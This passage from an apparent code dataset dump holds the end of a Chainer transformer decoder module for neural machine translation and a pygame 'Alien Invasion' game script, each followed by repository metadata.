mb_size_mask_input == mb_size_inpt\n assert nQ_mask_input == 1\n assert n_heads_mask_input == self.n_heads\n \n mb_size_src, max_length_src, d_model_src = src.data.shape\n assert max_length_src == nV_mask_input\n assert mb_size_src == mb_size_inpt\n \n# assert mask.shape == (mb_size_inpt, self.n_heads, 1, )\n if prev_states is not None:\n prev_self_attn, prev_cross_attn = prev_states\n full_tgt = F.concat((prev_self_attn, new_inpt) , axis=1)\n else:\n full_tgt = new_inpt\n \n y1_last = self.self_attention_layer(full_tgt, mask = None, only_last=True)\n \n if prev_states is not None:\n full_y1 = F.concat((prev_cross_attn, y1_last) , axis=1)\n else:\n full_y1 = y1_last\n \n y2_last = self.cross_attention_layer(full_y1, src, mask_input, only_last=True)\n y3_last = self.ff_layer(y2_last)\n return y3_last, (full_tgt, full_y1)\n \nclass DecoderMultiLayer(ChainList):\n def __init__(self, d_model, n_heads, d_ff=2048, experimental_relu=False, dropout=None, nb_layers=6,\n residual_mode=\"normal\", no_normalize=False):\n super(DecoderMultiLayer, self).__init__()\n for _ in six.moves.range(nb_layers):\n self.add_link(DecoderLayer(d_model, n_heads, d_ff=d_ff, experimental_relu=experimental_relu, dropout=dropout,\n residual_mode=residual_mode, no_normalize=no_normalize))\n \n def __call__(self, tgt, src, mask, mask_input):\n for link in self:\n tgt = link(tgt, src, mask, mask_input)\n return tgt\n \n def one_step(self, new_inpt, prev_states, src, mask_input):\n assert prev_states is None or len(prev_states) == len(self)\n new_prev_tgt = []\n tgt_last = new_inpt\n for num_link, link in enumerate(self):\n tgt_last, this_prev_tgt = link.one_step(tgt_last, prev_states[num_link] if prev_states is not None else None, src, mask_input)\n new_prev_tgt.append(this_prev_tgt)\n return tgt_last, 
tuple(new_prev_tgt) \n \n# class FakeDecoderMultiLayer(Chain):\n# def __init__(self, d_model, n_heads, d_ff=2048, experimental_relu=False, dropout=None, nb_layers=6,\n# no_add=False, no_normalize=False):\n# super(DecoderMultiLayer, self).__init__( \n# ff_layer1 = FeedForward(d_model, d_ff=d_ff, dropout=dropout, no_add=no_add, no_normalize=no_normalize),\n# self_attention_layer1 = AddAndNormalizedSelfAttentionLayer(d_model=d_model, n_heads=n_heads,\n# experimental_relu=experimental_relu,\n# dropout=dropout, no_add=no_add, no_normalize=no_normalize),\n# ff_layer2 = FeedForward(d_model, d_ff=d_ff, dropout=dropout, no_add=no_add, no_normalize=no_normalize),\n# self_attention_layer2 = AddAndNormalizedSelfAttentionLayer(d_model=d_model, n_heads=n_heads,\n# experimental_relu=experimental_relu,\n# dropout=dropout, no_add=no_add, no_normalize=no_normalize),\n# ff_layer3 = FeedForward(d_model, d_ff=d_ff, dropout=dropout, no_add=no_add, no_normalize=no_normalize),\n# self_attention_layer3 = AddAndNormalizedSelfAttentionLayer(d_model=d_model, n_heads=n_heads,\n# experimental_relu=experimental_relu,\n# dropout=dropout, no_add=no_add, no_normalize=no_normalize)\n# )\n# \n# def __call__(self, tgt, src, mask, mask_input, train=True):\n# y1 = self.ff_layer1(self.self_attention_layer1(tgt, mask))\n# y2 = self.ff_layer2(self.self_attention_layer2(y1, mask))\n# y3 = self.ff_layer3(self.self_attention_layer3(y2, mask))\n# return y3\n# \n# def one_step(self, new_inpt, prev_states, src, mask_input, train=True):\n# assert prev_states is None or len(prev_states) == len(self)\n# new_prev_tgt = []\n# tgt_last = new_inpt\n# for num_link, link in enumerate(self):\n# tgt_last, this_prev_tgt = link.one_step(tgt_last, prev_states[num_link] if prev_states is not None else None, src, mask_input, train=train)\n# new_prev_tgt.append(this_prev_tgt)\n# return tgt_last, tuple(new_prev_tgt) \n \nclass DecoderState(object):\n def __init__(self, pos, prev_states):\n self.pos = pos\n self.prev_states = prev_states\n self.mb_size = self.prev_states[0][0].data.shape[0]\n assert all(st.data.shape[0] == self.mb_size for state_group in prev_states for st in state_group) # all() so the check actually fires; a bare list is always truthy\n assert isinstance(pos, int) and pos >= -1\n \n def get_mb_size(self):\n return self.mb_size\n \n def reduce_to_minibatch_size(self, new_minibatch_size):\n assert new_minibatch_size <= self.mb_size\n if new_minibatch_size == self.mb_size:\n return self\n else:\n splitted_states = []\n for state_group in self.prev_states:\n splitted_states.append(\n tuple(cut_minibatch(st, new_minibatch_size) for st in state_group)\n )\n return DecoderState(self.pos, tuple(splitted_states))\n \n def get_states(self):\n return self.prev_states\n \n def get_pos(self):\n return self.pos\n \nclass ConditionalizedDecoderCell(object):\n def __init__(self, decoder_chain, src_encoding, mask_input):\n self.decoder_chain = decoder_chain\n self.src_encoding = src_encoding\n src_mb_size, src_max_length, src_d_model = src_encoding.data.shape\n self.src_mb_size = src_mb_size\n self.mask_input = mask_input\n \n def get_initial_logits(self, mb_size = None):\n if mb_size is None:\n mb_size = self.src_mb_size\n else:\n assert self.src_mb_size == 1\n assert mb_size is not None\n \n bos_encoding = F.broadcast_to(self.decoder_chain.bos_encoding, (mb_size, 1, self.decoder_chain.d_model))\n \n cross_mask = self.decoder_chain.xp.broadcast_to(self.mask_input[:,0:1,0:1,:], (self.mask_input.shape[0], self.decoder_chain.n_heads, 1, self.mask_input.shape[3]))\n \n final_layer, prev_states = 
self.decoder_chain.encoding_layers.one_step(bos_encoding, None,\n self.src_encoding, cross_mask)\n \n logits = self.decoder_chain.logits_layer(F.reshape(final_layer, (mb_size, self.decoder_chain.d_model)))\n return logits, DecoderState(pos=-1, prev_states=prev_states)\n \n def __call__(self, prev_decoder_state, inpt):\n current_mb_size = inpt.shape[0]\n# mask = np.zeros((current_mb_size, ), dtype = np.float32)\n# padded = np.zeros((current_mb_size, ), dtype = np.float32)\n# for num_batch, idx in enumerate(inpt):\n# padded[num_batch] = idx if idx is not None else 0\n# mask[num_batch] = 0 if idx is not None else -10000\n \n prev_decoder_state = prev_decoder_state.reduce_to_minibatch_size(current_mb_size)\n current_pos = prev_decoder_state.get_pos() + 1\n \n encoded = self.decoder_chain.emb(inpt)\n pos_vect = self.decoder_chain.get_one_pos_vect(current_mb_size, current_pos)\n \n encoded = encoded + pos_vect\n \n if self.decoder_chain.dropout is not None:\n encoded = F.dropout(encoded, self.decoder_chain.dropout)\n \n cross_mask = self.decoder_chain.xp.broadcast_to(\n self.mask_input[:,0:1,0:1,:], \n (self.mask_input.shape[0], self.decoder_chain.n_heads, 1, self.mask_input.shape[3]))\n \n final_layer, prev_states = self.decoder_chain.encoding_layers.one_step(encoded, prev_decoder_state.get_states(),\n self.src_encoding, cross_mask)\n \n# logits = apply_linear_layer_to_last_dims(final_layer, self.decoder_chain.logits_layer)\n logits = self.decoder_chain.logits_layer(F.reshape(final_layer, (current_mb_size, self.decoder_chain.d_model)))\n return logits, DecoderState(pos=current_pos, prev_states=prev_states)\n \nclass Decoder(Chain):\n def __init__(self, V, d_model=512, n_heads=8, d_ff=2048, experimental_relu=False, dropout=None, nb_layers=6,\n residual_mode=\"normal\", no_normalize=False):\n super(Decoder, self).__init__(\n emb = L.EmbedID(V, d_model),\n encoding_layers = DecoderMultiLayer(d_model, n_heads, d_ff=d_ff,\n experimental_relu=experimental_relu, \n dropout=dropout, nb_layers=nb_layers,\n residual_mode=residual_mode, no_normalize=no_normalize),\n logits_layer = L.Linear(d_model, V + 1)\n )\n \n self.dropout = dropout\n self.n_heads = n_heads\n self.d_model = d_model\n self.cached_pos_vect = None\n \n self.add_param(\"bos_encoding\", (1, 1, d_model))\n self.bos_encoding.data[...] 
= np.random.randn(d_model)\n \n self.V = V\n self.eos_idx = V\n \n def get_device(self):\n if self.xp is np:\n return None\n else:\n return self.emb.W.data.device\n \n def move_np_array_to_correct_device(self, np_array):\n device = self.get_device()\n if device is None:\n return np_array\n else:\n return chainer.cuda.to_gpu(np_array, device=device)\n \n def get_conditionalized_cell(self, encoded_input, mask_input):\n return ConditionalizedDecoderCell(self, encoded_input, mask_input)\n \n \n def get_cached_pos_vect(self, length): \n if self.cached_pos_vect is None or self.cached_pos_vect.shape[0] < length:\n self.cached_pos_vect = generate_pos_vectors(self.d_model, length)\n self.cached_pos_vect = self.move_np_array_to_correct_device(self.cached_pos_vect)\n return self.cached_pos_vect\n \n def get_pos_vect(self, mb_size, length):\n cached_pos_vect = self.get_cached_pos_vect(length)\n# print self.cached_pos_vect[None, :length, :].shape, mb_size, length, self.d_model\n return self.xp.broadcast_to(cached_pos_vect[None, :length, :], (mb_size, length, self.d_model))\n \n def get_one_pos_vect(self, mb_size, pos):\n cached_pos_vect = self.get_cached_pos_vect(pos+1)\n return self.xp.broadcast_to(cached_pos_vect[None, pos:pos+1, :], (mb_size, 1, self.d_model))\n \n def make_batch(self, seq_list):\n padded_data = pad_data(seq_list, pad_value=0)\n seq_length = [len(x) + 1 for x in seq_list] #BOS\n max_length_1 = max(seq_length)\n max_length_2 = max_length_1\n mb_size = len(seq_list)\n mask = make_batch_mask(mb_size, self.n_heads, max_length_1, max_length_2, \n# key_seq_lengths=seq_length, #actually not needed\n future_mask=True,\n mask_value=-10000)\n \n padded_data = self.move_np_array_to_correct_device(padded_data)\n mask = self.move_np_array_to_correct_device(mask)\n \n return padded_data, mask\n \n def compute_logits(self, seq_list, encoded_input, mask_input):\n mb_size = len(seq_list)\n max_length_1 = max(len(x) for x in seq_list)\n x, mask = self.make_batch(seq_list)\n \n# print \"padded_data\", x\n# print \"mask\", mask\n \n assert self.xp.all(mask_input == self.xp.broadcast_to(mask_input[:,0:1,0:1,:], mask_input.shape))\n \n encoded = self.emb(x)\n encoded += self.get_pos_vect(mb_size, max_length_1)\n \n if self.dropout is not None:\n encoded = F.dropout(encoded, self.dropout)\n \n bos_plus_encoded = F.concat((F.broadcast_to(self.bos_encoding, (mb_size, 1, self.d_model)), encoded), axis=1)\n \n cross_mask = self.xp.broadcast_to(mask_input[:,0:1,0:1,:], (mask_input.shape[0], self.n_heads, bos_plus_encoded.data.shape[1], mask_input.shape[3]))\n \n final_layer = self.encoding_layers(bos_plus_encoded, encoded_input, mask, cross_mask)\n logits = apply_linear_layer_to_last_dims(final_layer, self.logits_layer)\n return logits\n \n def compute_loss(self, seq_list, encoded_input, mask_input, reduce=\"mean\"):\n logits = self.compute_logits(seq_list, encoded_input, mask_input)\n padded_target_with_eos = pad_data(seq_list, pad_value=-1, add_eos=self.eos_idx)\n padded_target_with_eos = self.move_np_array_to_correct_device(padded_target_with_eos)\n loss = F.softmax_cross_entropy(F.reshape(logits, (-1, self.V+1)), padded_target_with_eos.reshape(-1,), reduce=reduce)\n return loss\n \n", "repo_name": "fabiencro/knmt", "sub_path": "nmt_chainer/models/feedforward/decoder.py", "file_name": "decoder.py", "file_ext": "py", "file_size_in_byte": 15612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 46, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", 
"line_number": 16, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 18, "usage_type": "attribute"}, {"api_name": "chainer.Chain", "line_number": 20, "usage_type": "name"}, {"api_name": "nmt_chainer.models.feedforward.utils.FeedForward", "line_number": 24, "usage_type": "call"}, {"api_name": "nmt_chainer.models.feedforward.multi_attention.AddAndNormalizedSelfAttentionLayer", "line_number": 25, "usage_type": "call"}, {"api_name": "nmt_chainer.models.feedforward.multi_attention.AddAndNormalizedCrossAttentionLayer", "line_number": 29, "usage_type": "call"}, {"api_name": "chainer.functions.concat", "line_number": 61, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 61, "usage_type": "name"}, {"api_name": "chainer.functions.concat", "line_number": 68, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 68, "usage_type": "name"}, {"api_name": "chainer.ChainList", "line_number": 76, "usage_type": "name"}, {"api_name": "six.moves.range", "line_number": 80, "usage_type": "call"}, {"api_name": "six.moves", "line_number": 80, "usage_type": "attribute"}, {"api_name": "nmt_chainer.models.feedforward.utils.cut_minibatch", "line_number": 150, "usage_type": "call"}, {"api_name": "chainer.functions.broadcast_to", "line_number": 175, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 175, "usage_type": "name"}, {"api_name": "chainer.functions.reshape", "line_number": 182, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 182, "usage_type": "name"}, {"api_name": "chainer.functions.dropout", "line_number": 202, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 202, "usage_type": "name"}, {"api_name": "chainer.functions.reshape", "line_number": 212, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 212, "usage_type": "name"}, {"api_name": "chainer.Chain", "line_number": 215, "usage_type": "name"}, {"api_name": "chainer.links.EmbedID", "line_number": 219, "usage_type": "call"}, {"api_name": "chainer.links", "line_number": 219, "usage_type": "name"}, {"api_name": "chainer.links.Linear", "line_number": 224, "usage_type": "call"}, {"api_name": "chainer.links", "line_number": 224, "usage_type": "name"}, {"api_name": "numpy.random.randn", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 233, "usage_type": "attribute"}, {"api_name": "chainer.cuda.to_gpu", "line_number": 249, "usage_type": "call"}, {"api_name": "chainer.cuda", "line_number": 249, "usage_type": "attribute"}, {"api_name": "nmt_chainer.models.feedforward.utils.generate_pos_vectors", "line_number": 257, "usage_type": "call"}, {"api_name": "nmt_chainer.models.feedforward.utils.pad_data", "line_number": 271, "usage_type": "call"}, {"api_name": "nmt_chainer.models.feedforward.utils.make_batch_mask", "line_number": 276, "usage_type": "call"}, {"api_name": "chainer.functions.dropout", "line_number": 300, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 300, "usage_type": "name"}, {"api_name": "chainer.functions.concat", "line_number": 302, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 302, "usage_type": "name"}, {"api_name": "chainer.functions.broadcast_to", "line_number": 302, "usage_type": "call"}, {"api_name": "nmt_chainer.models.feedforward.utils.apply_linear_layer_to_last_dims", "line_number": 307, "usage_type": "call"}, {"api_name": 
"nmt_chainer.models.feedforward.utils.pad_data", "line_number": 312, "usage_type": "call"}, {"api_name": "chainer.functions.softmax_cross_entropy", "line_number": 314, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 314, "usage_type": "name"}, {"api_name": "chainer.functions.reshape", "line_number": 314, "usage_type": "call"}]} +{"seq_id": "18829807849", "text": "# Author : Gary Godfrey\n# Date : 5th Oct 2021\n# Desc : The is the main program for the Alien Invasion project in\n# : Python Crash Course.\n#\n# Mods : 8th Oct - Shooting & destroying the aliens\n# : 8th Oct - Game Statistics\n# : 11th Oct - Game starting, stopping & scoring\n# : 22nd Oct - Getting creative and adding sounds additional to book\n# Added level to saved high score, and moved save to game_stats.py\n# Moved level on screen to match high-score format\n# : 25th Oct - Refactor _check_bullet_alien_colilsions to _start_new_level\n# self.sb.prep_ships() was called here instead of init in scoreboard\n# simplified image prep with new refactored scoreboard.prep_images\n\n# Standard library imports\n\n# Use the amazing traceback from the rich library to catch and show errors\n# much more clearly and easier to read.\nfrom rich.traceback import install\ninstall(show_locals=True)\n\nimport sys\nimport pygame.mouse\nimport pygame.sprite # Added to get intellisense to work for the sprite methods\nfrom time import sleep\nimport pygame.mixer\nimport pygame.event\nimport numpy as np\n\n# Custom imports\n\nfrom settings import Settings\nfrom ship import Ship\nfrom bullet import Bullet\nfrom alien import Alien\nfrom game_stats import GameStats\nfrom button import Button\nfrom scoreboard import Scoreboard\n\nclass AlienInvasion:\n \"\"\"Overall class to manage game assets and behavior.\"\"\"\n\n def __init__(self):\n \"\"\"Initialise the game and create game resources.\"\"\"\n pygame.init()\n\n # Initialise Sounds\n pygame.mixer.init()\n\n buffer1 = np.sin(2 * np.pi * np.arange(44100) * 600 / 44100).astype(np.float32)\n self.sound_bullet = pygame.mixer.Sound(buffer1)\n buffer2 = np.sin(2 * np.pi * np.arange(44100) * 480 / 44100).astype(np.float32)\n self.sound_alien = pygame.mixer.Sound(buffer2)\n\n self.settings = Settings()\n\n # Windowed\n self.screen = pygame.display.set_mode((self.settings.screen_width, self.settings.screen_height))\n\n # Fullscreen\n # self.screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n # self.settings.screen_width = self.screen.get_rect().width\n # self.settings.screen_height = self.screen.get_rect().height\n \n pygame.display.set_caption(\"Alien Invasion\")\n\n # Create an instance to store game statistics\n # and create a scoreboard\n self.stats = GameStats(self)\n self.sb = Scoreboard(self)\n\n self.ship = Ship(self)\n self.bullets = pygame.sprite.Group()\n self.aliens = pygame.sprite.Group()\n \n self._create_fleet()\n\n # Make the play button\n self.play_button = Button(self, \"Play\")\n\n def run_game(self):\n \"\"\"Start the main loop for the game.\"\"\"\n while True:\n self._check_events()\n\n if self.stats.game_active:\n self.ship.update()\n self._update_bullets()\n\n self._update_aliens()\n self._update_screen()\n\n def _check_events(self):\n \"\"\"Respond to keyboard and mouse events\"\"\"\n # Helper Method\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.stats.save_high_score()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n self._check_keydown_events(event)\n elif event.type == pygame.KEYUP:\n self._check_keyup_events(event)\n elif 
event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = pygame.mouse.get_pos()\n self._check_play_button(mouse_pos)\n\n def _check_keydown_events(self, event):\n \"\"\"Respond to key presses\"\"\"\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = True\n elif event.key == pygame.K_q or event.key == pygame.K_ESCAPE:\n self.stats.save_high_score()\n sys.exit()\n elif event.key == pygame.K_SPACE:\n self._fire_bullet()\n elif event.key == pygame.K_RETURN or event.key == pygame.K_p:\n self._start_game()\n\n def _check_keyup_events(self,event):\n \"\"\"Respond to key releases\"\"\"\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = False\n\n def _check_play_button(self, mouse_pos):\n \"\"\"Start a new game when the player clicks on Play\"\"\"\n button_clicked = self.play_button.rect.collidepoint(mouse_pos)\n if button_clicked and not self.stats.game_active:\n self._start_game()\n \n def _start_game(self):\n \"\"\"Check if a game is already in play before resetting the game\"\"\"\n if not self.stats.game_active:\n # Reset the game settings\n self.settings.initialise_dynamic_settings()\n self.stats.reset_stats()\n self.stats.game_active = True\n self.sb.prep_images()\n\n # Get rid of any remaining aliens and bullets\n self.aliens.empty()\n self.bullets.empty()\n\n # Create a new fleet and center the ship\n self._create_fleet()\n self.ship.centre_ship()\n\n # Hide the mouse pointer\n pygame.mouse.set_visible(False)\n\n def _fire_bullet(self):\n \"\"\"Create a new bullet and add it to the bullets group\"\"\"\n if len(self.bullets) < self.settings.bullets_allowed and self.stats.game_active:\n new_bullet = Bullet(self)\n self.bullets.add(new_bullet)\n self.sound_bullet.play(0,50)\n self.stats.bullets_fired += 1\n self.sb.prep_accuracy()\n\n def _update_bullets(self):\n \"\"\"Update position of bullets and get rid of old bullets\"\"\"\n # Update bullet position\n self.bullets.update()\n\n # Get rid of bullets that have gone off the top of the screen\n for bullet in self.bullets.copy():\n if bullet.rect.bottom <= 0:\n self.bullets.remove(bullet)\n \n self._check_bullet_alien_collisions()\n\n def _check_bullet_alien_collisions(self):\n \"\"\"Respond to bullet-alien collisions\"\"\"\n # Check for any bullets that have hit aliens.\n # If so, get rid of the bullet and the alien.\n\n collisions = pygame.sprite.groupcollide(\n self.bullets, self.aliens, True, True)\n\n if collisions:\n # print(collisions)\n for aliens in collisions.values():\n # Make sure that we count all the hit aliens\n self.stats.score += self.settings.alien_points * len(aliens)\n self.stats.bullets_on_target += len(aliens)\n self.sb.prep_score()\n self.sb.prep_accuracy()\n self.sb.check_high_score() # Which also preps high score if changed\n\n if not self.aliens: # the aliens group is empty\n self._start_new_level()\n\n def _start_new_level(self):\n # Destroy existing bullets and create a new fleet\n self.bullets.empty()\n self._create_fleet()\n # Increase the game speed\n self.settings.increase_speed()\n\n # Increase level (which is now an attribute of score so is rendered with that)\n self.stats.level += 1\n\n def _update_aliens(self):\n \"\"\"Check if the fleet is at an edge,\n then update the position of all aliens in the fleet\"\"\"\n self._check_fleet_edges()\n self.aliens.update()\n\n # Look for alien-ship collisions\n if pygame.sprite.spritecollideany(self.ship, self.aliens):\n 
self._ship_hit()\n\n # Look for aliens landing\n self._check_aliens_bottom()\n\n def _create_fleet(self):\n \"\"\"Create the fleet of aliens\"\"\"\n # Create an alien and find out how many can fit on a row\n # Space between each alien is equal to one alien width\n alien = Alien(self)\n alien_width, alien_height = alien.rect.size\n # Subtracted 1 from screen width to avoid the case where the width is exactly divisible by the alien width - GG\n available_space_x = (self.settings.screen_width - 1) - (2 * alien_width)\n number_aliens_x = (self.settings.screen_width - 1) // (2 * alien_width)\n\n # Determining the number of rows of aliens that fit on the screen\n ship_height = self.ship.rect.height\n available_space_y = (self.settings.screen_height - \n (3 * alien_height) - ship_height)\n number_rows = available_space_y // (2 * alien_height)\n\n # Create the fleet of aliens\n for row_number in range(number_rows):\n for alien_number in range(number_aliens_x):\n self._create_alien(alien_number, row_number)\n\n def _create_alien(self, alien_number, row_number):\n \"\"\" Create an alien and place it in the row \"\"\"\n alien = Alien(self)\n alien_width, alien_height = alien.rect.size\n alien.x = alien_width + 2 * alien_width * alien_number\n alien.rect.x = alien.x\n alien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\n self.aliens.add(alien)\n\n def _check_fleet_edges(self):\n \"\"\"Respond appropriately if any aliens have reached an edge\"\"\"\n for alien in self.aliens.sprites():\n if alien.check_edges():\n self._change_fleet_direction()\n self.sound_alien.play(0,50)\n break\n\n def _check_aliens_bottom(self):\n \"\"\"Check if any aliens have reached the bottom of the screen\"\"\"\n screen_rect = self.screen.get_rect()\n for alien in self.aliens.sprites():\n if alien.rect.bottom >= screen_rect.bottom:\n # Treat this the same as if the ship got hit (aliens have landed)\n self._ship_hit()\n break\n\n def _change_fleet_direction(self):\n \"\"\"Drop the entire fleet and change the fleet's direction\"\"\"\n if self.stats.game_active: # If not active the aliens should bound back and forth (Demo mode)\n for alien in self.aliens.sprites():\n alien.rect.y += self.settings.fleet_drop_speed\n self.settings.fleet_direction *= -1\n \n def _update_screen(self):\n \"\"\"Update images on the screen, and flip to the new screen\"\"\"\n # Helper Method\n self.screen.fill(self.settings.bg_color)\n self.ship.blitme()\n\n for bullet in self.bullets.sprites():\n bullet.draw_bullet()\n\n self.aliens.draw(self.screen)\n \n # Draw the scoreboard\n self.sb.show_score()\n \n # Draw the play button if the game is inactive\n if not self.stats.game_active:\n self.play_button.draw_button()\n\n # Make the most recently drawn screen visible.\n pygame.display.flip()\n\n def _ship_hit(self):\n \"\"\"Respond to the ship being hit by an alien\"\"\"\n\n # Pause to let the player see they've been hit/had an alien land\n\n if self.stats.ships_left > 0:\n # Decrement ships left & update the lives left (scoreboard)\n self.stats.ships_left -= 1\n self.sb.prep_ships()\n\n # Get rid of any remaining aliens and bullets\n self.aliens.empty()\n self.bullets.empty()\n\n # Create a new fleet and centre the ship\n self._create_fleet()\n self.ship.centre_ship()\n\n # Pause to let the player regroup\n sleep(0.5)\n else:\n self.stats.game_active = False\n pygame.mouse.set_visible(True)\n\nif __name__ == '__main__':\n # Make a game instance and run the game.\n ai = AlienInvasion()\n ai.run_game()", "repo_name": "ClearSky0/AlienInvasion", "sub_path": 
"alien_invasion.py", "file_name": "alien_invasion.py", "file_ext": "py", "file_size_in_byte": 11940, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rich.traceback.install", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.mouse.init", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 46, "usage_type": "name"}, {"api_name": "pygame.mouse.mixer.init", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.mouse.mixer", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.sin", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pygame.mouse.mixer.Sound", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.mouse.mixer", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.sin", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.mouse.mixer.Sound", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.mouse.mixer", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 54, "usage_type": "name"}, {"api_name": "settings.Settings", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.mouse.display.set_mode", "line_number": 59, "usage_type": "call"}, {"api_name": "pygame.mouse.display", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 59, "usage_type": "name"}, {"api_name": "pygame.mouse.display.set_caption", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.mouse.display", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 66, "usage_type": "name"}, {"api_name": "game_stats.GameStats", "line_number": 70, "usage_type": "call"}, {"api_name": "scoreboard.Scoreboard", "line_number": 71, "usage_type": "call"}, {"api_name": "ship.Ship", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.mouse.sprite.Group", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.mouse.sprite", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 74, "usage_type": "name"}, {"api_name": "pygame.mouse.sprite.Group", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.mouse.sprite", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 75, "usage_type": "name"}, {"api_name": "button.Button", "line_number": 80, "usage_type": "call"}, {"api_name": "pygame.mouse.event.get", "line_number": 97, "usage_type": "call"}, {"api_name": "pygame.mouse.event", "line_number": 97, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 97, "usage_type": "name"}, {"api_name": "pygame.mouse.QUIT", "line_number": 98, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 98, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 100, "usage_type": "call"}, {"api_name": 
"pygame.mouse.KEYDOWN", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 101, "usage_type": "name"}, {"api_name": "pygame.mouse.KEYUP", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 103, "usage_type": "name"}, {"api_name": "pygame.mouse.MOUSEBUTTONDOWN", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 105, "usage_type": "name"}, {"api_name": "pygame.mouse.mouse.get_pos", "line_number": 106, "usage_type": "call"}, {"api_name": "pygame.mouse.mouse", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 106, "usage_type": "name"}, {"api_name": "pygame.mouse.K_RIGHT", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 111, "usage_type": "name"}, {"api_name": "pygame.mouse.K_LEFT", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 113, "usage_type": "name"}, {"api_name": "pygame.mouse.K_q", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 115, "usage_type": "name"}, {"api_name": "pygame.mouse.K_ESCAPE", "line_number": 115, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 117, "usage_type": "call"}, {"api_name": "pygame.mouse.K_SPACE", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 118, "usage_type": "name"}, {"api_name": "pygame.mouse.K_RETURN", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 120, "usage_type": "name"}, {"api_name": "pygame.mouse.K_p", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.mouse.K_RIGHT", "line_number": 125, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 125, "usage_type": "name"}, {"api_name": "pygame.mouse.K_LEFT", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 127, "usage_type": "name"}, {"api_name": "pygame.mouse.mouse.set_visible", "line_number": 154, "usage_type": "call"}, {"api_name": "pygame.mouse.mouse", "line_number": 154, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 154, "usage_type": "name"}, {"api_name": "bullet.Bullet", "line_number": 159, "usage_type": "call"}, {"api_name": "bullet.rect", "line_number": 172, "usage_type": "attribute"}, {"api_name": "pygame.mouse.sprite.groupcollide", "line_number": 182, "usage_type": "call"}, {"api_name": "pygame.mouse.sprite", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 182, "usage_type": "name"}, {"api_name": "pygame.mouse.sprite.spritecollideany", "line_number": 215, "usage_type": "call"}, {"api_name": "pygame.mouse.sprite", "line_number": 215, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 215, "usage_type": "name"}, {"api_name": "alien.Alien", "line_number": 225, "usage_type": "call"}, {"api_name": "alien.rect", "line_number": 226, "usage_type": "attribute"}, {"api_name": "alien.Alien", "line_number": 244, "usage_type": "call"}, {"api_name": "alien.rect", "line_number": 245, "usage_type": "attribute"}, {"api_name": 